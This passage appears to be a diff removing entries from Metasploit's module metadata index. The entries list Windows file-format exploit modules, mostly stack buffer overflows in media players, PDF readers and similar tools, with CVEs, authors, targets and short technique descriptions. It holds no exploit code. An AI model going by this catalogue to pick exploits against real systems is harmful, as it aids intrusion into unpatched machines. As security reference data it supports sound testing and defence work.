malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n If no PATH is specified, the module will use drive letters D through Z so the files\n may be placed in the root path of a drive such as a shared VM folder or USB drive.", - "references": [ - "CVE-2017-8464", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464", - "URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt", - "URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx", - "URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm", - "URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows x64", - "Windows x86" - ], - "mod_time": "2023-03-13 10:31:27 +0000", - "path": "/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cve_2017_8464_lnk_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cyberlink_lpp_bof": { - "name": "CyberLink LabelPrint 2.5 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/cyberlink_lpp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-09-23", - "type": "exploit", - "author": [ - "modpr0be ", - "f3ci " - ], - "description": "This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.\n The 
vulnerability is triggered when opening a .lpp project file containing overly long string characters\n via open file menu. This results in overwriting a structured exception handler record and take over the\n application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).", - "references": [ - "CVE-2017-14627", - "EDB-42777" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)", - "CyberLink LabelPrint <= 2.5 on Windows 8.1 x64", - "CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cyberlink_lpp_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cyberlink_p2g_bof": { - "name": "CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit", - "fullname": "exploit/windows/fileformat/cyberlink_p2g_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-09-12", - "type": "exploit", - "author": [ - "modpr0be ", - "mr_me " - ], - "description": "This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x\n The vulnerability is triggered when opening a malformed p2g file containing an overly\n long string in the 'name' attribute of the file element. 
This results in overwriting a\n structured exception handler record.", - "references": [ - "CVE-2011-5171", - "BID-50997", - "OSVDB-77600", - "EDB-18220", - "US-CERT-VU-158003" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CyberLink Power2Go 8 (XP/Vista/win7) Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cyberlink_p2g_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cytel_studio_cy3": { - "name": "Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/cytel_studio_cy3", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-10-02", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "James Fitts " - ], - "description": "This module exploits a stack based buffer overflow found\n in Cytel Studio <= 9.0. 
The overflow is triggered during the\n copying of strings to a stack buffer of 256 bytes.", - "references": [ - "OSVDB-75991", - "BID-49924", - "URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Cytel Studio 9.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cytel_studio_cy3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/deepburner_path": { - "name": "AstonSoft DeepBurner (DBR File) Path Buffer Overflow", - "fullname": "exploit/windows/fileformat/deepburner_path", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-12-19", - "type": "exploit", - "author": [ - "Expanders", - "fl0 fl0w", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in versions 1.9.0.228,\n 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n DBR file within a browser, since the DBR extension is registered to DeepBurner.", - "references": [ - "BID-21657", - "OSVDB-32356", - "CVE-2006-6665", - "EDB-2950", - "EDB-8335", - "EDB-11315" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/deepburner_path.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/deepburner_path", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": null - }, - "exploit_windows/fileformat/destinymediaplayer16": { - "name": "Destiny Media Player 1.61 PLS M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/destinymediaplayer16", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-01-03", - "type": "exploit", - "author": [ - "Trancek " - ], - "description": "This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n An attacker must send the file to victim and the victim must open the file. File-->Open Playlist", - "references": [ - "CVE-2009-3429", - "OSVDB-53249", - "EDB-7651", - "BID-33091" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Destiny Universal", - "Windows XP SP2 Spanish" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/destinymediaplayer16.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/destinymediaplayer16", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/digital_music_pad_pls": { - "name": "Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/digital_music_pad_pls", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-09-17", - "type": "exploit", - "author": [ - "Abhishek Lyall " - ], - "description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n When opening a malicious pls file with the Digital Music Pad,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", - "references": [ - "OSVDB-68178", - "URL-http://web.archive.org/web/20100923154433/http://secunia.com:80/advisories/41519", - "EDB-15134" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2" - ], - 
"mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/digital_music_pad_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/djstudio_pls_bof": { - "name": "DJ Studio Pro 5.1 .pls Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/djstudio_pls_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-12-30", - "type": "exploit", - "author": [ - "Sebastien Duquette", - "Death-Shadow-Dark " - ], - "description": "This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.\n When handling a .pls file, DJ Studio will copy the user-supplied data on the stack\n without any proper bounds checking done beforehand, therefore allowing code\n execution under the context of the user.", - "references": [ - "CVE-2009-4656", - "OSVDB-58159", - "EDB-10827" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "DJ Studio Pro 5.1.6.5.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/djstudio_pls_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/djstudio_pls_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/djvu_imageurl": { - "name": "DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow", - "fullname": "exploit/windows/fileformat/djvu_imageurl", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-10-30", - "type": "exploit", - "author": [ - "dean " - ], - "description": "This module exploits a stack buffer overflow in DjVu ActiveX Component. 
When sending an\n overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.", - "references": [ - "CVE-2008-4922", - "OSVDB-49592", - "BID-31987" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/djvu_imageurl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/documalis_pdf_editor_and_scanner": { - "name": "Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/documalis_pdf_editor_and_scanner", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-05-22", - "type": "exploit", - "author": [ - "metacom", - "metacom27 " - ], - "description": "Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not\n appropriately validate the contents of JPEG images contained within a PDF. 
Attackers can exploit\n this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the\n user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10", - "Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/documalis_pdf_editor_and_scanner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/dupscout_xml": { - "name": "Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow", - "fullname": "exploit/windows/fileformat/dupscout_xml", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-29", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16\n by using the import command option to import a specially crafted xml file.", - "references": [ - "CVE-2017-7310" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/dupscout_xml.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/dupscout_xml", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/fileformat/dvdx_plf_bof": { - "name": "DVD X Player 5.5 .plf PlayList Buffer Overflow", - "fullname": "exploit/windows/fileformat/dvdx_plf_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-06-02", - "type": "exploit", - "author": [ - "n00b", - "D3r K0n!G", - "sickness", - "sinn3r " - ], - "description": "This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and\n Standard. By supplying a long string of data in a plf file (playlist), the\n MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,\n and then copy it on the stack without any proper bounds checking, which causes a\n buffer overflow, and results in arbitrary code execution under the context of the user.\n\n This module has been designed to target common Windows systems such as:\n Windows XP SP2/SP3, Windows Vista, and Windows 7.", - "references": [ - "CVE-2007-3068", - "OSVDB-36956", - "BID-24278", - "EDB-17745" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "DVD X Player 5.5 Standard / Pro" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/dvdx_plf_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/dvdx_plf_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/easycdda_pls_bof": { - "name": "Easy CD-DA Recorder PLS Buffer Overflow", - "fullname": "exploit/windows/fileformat/easycdda_pls_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-06-07", - "type": "exploit", - "author": [ - "chap0", - "Gabor Seljan", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a 
specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.", - "references": [ - "BID-40631", - "EDB-13761", - "OSVDB-65256", - "CVE-2010-2343", - "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Windows 7 SP1 (DEP Bypass)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/easycdda_pls_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/easycdda_pls_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/emc_appextender_keyworks": { - "name": "EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/emc_appextender_keyworks", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-09-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control\n (KeyHelp.ocx 1.2.3120.0). 
This ActiveX Control comes bundled with EMC's\n Documentation ApplicationXtender 5.4.", - "references": [ - "CVE-2012-2515", - "OSVDB-58423", - "BID-36546" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/emc_appextender_keyworks", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/erdas_er_viewer_bof": { - "name": "ERS Viewer 2011 ERS File Handling Buffer Overflow", - "fullname": "exploit/windows/fileformat/erdas_er_viewer_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-04-23", - "type": "exploit", - "author": [ - "Parvez Anwar", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2011\n (version 11.04). The vulnerability exists in the module ermapper_u.dll where the\n function ERM_convert_to_correct_webpath handles user provided data in an insecure\n way. It results in arbitrary code execution under the context of the user viewing\n a specially crafted .ers file. 
This module has been tested successfully with ERS\n Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2013-0726", - "OSVDB-92694", - "BID-59379", - "URL-http://web.archive.org/web/20130515231047/http://secunia.com/advisories/51725/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/erdas_er_viewer_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/erdas_er_viewer_rf_report_error": { - "name": "ERS Viewer 2013 ERS File Handling Buffer Overflow", - "fullname": "exploit/windows/fileformat/erdas_er_viewer_rf_report_error", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-23", - "type": "exploit", - "author": [ - "James Fitts", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.\n The vulnerability exists in the module ermapper_u.dll, where the function\n rf_report_error handles user provided data in an insecure way. It results in\n arbitrary code execution under the context of the user viewing a specially crafted\n .ers file. 
This module has been tested successfully with ERS Viewer 2013 (versions\n 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2013-3482", - "OSVDB-93650", - "URL-http://web.archive.org/web/20130609135637/http://secunia.com:80/advisories/53620" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR", - "ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/erdas_er_viewer_rf_report_error", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/esignal_styletemplate_bof": { - "name": "eSignal and eSignal Pro File Parsing Buffer Overflow in QUO", - "fullname": "exploit/windows/fileformat/esignal_styletemplate_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-06", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "TecR0c ", - "mr_me " - ], - "description": "The software is unable to handle the \"\" files (even those\n original included in the program) like those with the registered\n extensions QUO, SUM and POR. Successful exploitation of this\n vulnerability may take up to several seconds due to the use of\n egghunter. Also, DEP bypass is unlikely due to the limited space for\n payload. 
This vulnerability affects versions 10.6.2425.1208 and earlier.", - "references": [ - "CVE-2011-3494", - "OSVDB-75456", - "BID-49600", - "URL-http://aluigi.altervista.org/adv/esignal_1-adv.txt", - "EDB-17837" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Win XP SP3 / Windows Vista / Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/esignal_styletemplate_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/etrust_pestscan": { - "name": "CA eTrust PestPatrol ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/etrust_pestscan", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-11-02", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in CA eTrust PestPatrol. 
When\n sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-4225", - "OSVDB-60862" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/etrust_pestscan.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/etrust_pestscan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ezip_wizard_bof": { - "name": "eZip Wizard 3.0 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/ezip_wizard_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-03-09", - "type": "exploit", - "author": [ - "fl0 fl0w", - "jduck ", - "Lincoln" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 3.0 of ediSys Corp.'s eZip Wizard.\n\n In order for the command to be executed, an attacker must convince someone to\n open a specially crafted zip file with eZip Wizard, and access the specially\n file via double-clicking it. 
By doing so, an attacker can execute arbitrary\n code as the victim user.", - "references": [ - "CVE-2009-1028", - "OSVDB-52815", - "BID-34044", - "URL-http://www.edisys.com/", - "EDB-8180", - "EDB-12059" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ezip_wizard_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ezip_wizard_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/fatplayer_wav": { - "name": "Fat Player Media Player 0.6b0 Buffer Overflow", - "fullname": "exploit/windows/fileformat/fatplayer_wav", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-10-18", - "type": "exploit", - "author": [ - "James Fitts ", - "dookie" - ], - "description": "This module exploits a buffer overflow in Fat Player 0.6b. 
When\n the application is used to import a specially crafted wav file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "CVE-2009-4962", - "OSVDB-57343", - "EDB-15279" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/fatplayer_wav", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/fdm_torrent": { - "name": "Free Download Manager Torrent Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/fdm_torrent", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-02-02", - "type": "exploit", - "author": [ - "SkD ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Free Download Manager\n 3.0 Build 844. 
Arbitrary code execution could occur when parsing a\n specially crafted torrent file.", - "references": [ - "CVE-2009-0184", - "OSVDB-54033", - "BID-33555", - "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18", - "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18", - "URL-http://web.archive.org/web/20090205145829/http://secunia.com:80/secunia_research/2009-5", - "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Free Download Manager 3.0 (Build 844)" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/fdm_torrent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/feeddemon_opml": { - "name": "FeedDemon Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/feeddemon_opml", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-02-09", - "type": "exploit", - "author": [ - "fl0 fl0w", - "dookie", - "jduck " - ], - "description": "This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n is used to import a specially crafted opml file, a buffer overflow occurs allowing\n arbitrary code execution.\n\n All versions are suspected to be vulnerable. 
This vulnerability was originally reported\n against version 2.7 in February of 2009.", - "references": [ - "CVE-2009-0546", - "OSVDB-51753", - "BID-33630", - "EDB-7995", - "EDB-8010", - "EDB-11379" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/feeddemon_opml", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/foxit_reader_filewrite": { - "name": "Foxit PDF Reader 4.2 Javascript File Write", - "fullname": "exploit/windows/fileformat/foxit_reader_filewrite", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-05", - "type": "exploit", - "author": [ - "bannedit ", - "Chris Evans" - ], - "description": "This module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n version 4.2. The createDataObject() Javascript API function allows for writing\n arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\n Note: This exploit uses the All Users directory currently, which required\n administrator privileges to write to. This means an administrative user has to\n open the file to be successful. 
Kind of lame but thats how it goes sometimes in\n the world of file write bugs.", - "references": [ - "OSVDB-71104", - "URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)", - "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/foxit_reader_filewrite", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/foxit_reader_launch": { - "name": "Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow", - "fullname": "exploit/windows/fileformat/foxit_reader_launch", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-03-09", - "type": "exploit", - "author": [ - "Francisco Falcon", - "bannedit " - ], - "description": "This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.\n Due to the way Foxit Reader handles the input from an \"Launch\" action, it is possible\n to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code\n execution under the context of the user.", - "references": [ - "CVE-2009-0837", - "OSVDB-55614", - "BID-34035", - "URL-http://www.coresecurity.com/content/foxit-reader-vulnerabilities" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Foxit Reader 3.0 Windows XP SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/foxit_reader_launch", - "check": 
false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/foxit_reader_uaf": { - "name": "Foxit PDF Reader Pointer Overwrite UAF", - "fullname": "exploit/windows/fileformat/foxit_reader_uaf", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-04-20", - "type": "exploit", - "author": [ - "mr_me", - "bit from meepwn", - "saelo", - "Jacob Robles" - ], - "description": "Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability\n in the Text Annotations component and the TypedArray's use\n uninitialized pointers.\n\n The vulnerabilities can be combined to leak a vtable memory address,\n which can be adjusted to point to the base address of the executable.\n A ROP chain can be constructed that will execute when Foxit Reader\n performs the UAF.\n\n This module has been tested on Windows 7 x64, Windows 10 Pro x64\n Build 17134, and Windows 10 Enterprise x64. Windows 10 Enterprise\n must have insecure logons enabled for the exploit to work as expected.", - "references": [ - "CVE-2018-9948", - "CVE-2018-9958", - "ZDI-18-332", - "ZDI-18-342", - "URL-https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html", - "URL-https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 Pro x64 Build 17134" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/foxit_reader_uaf.rb", - "is_install_path": true, - "ref_name": 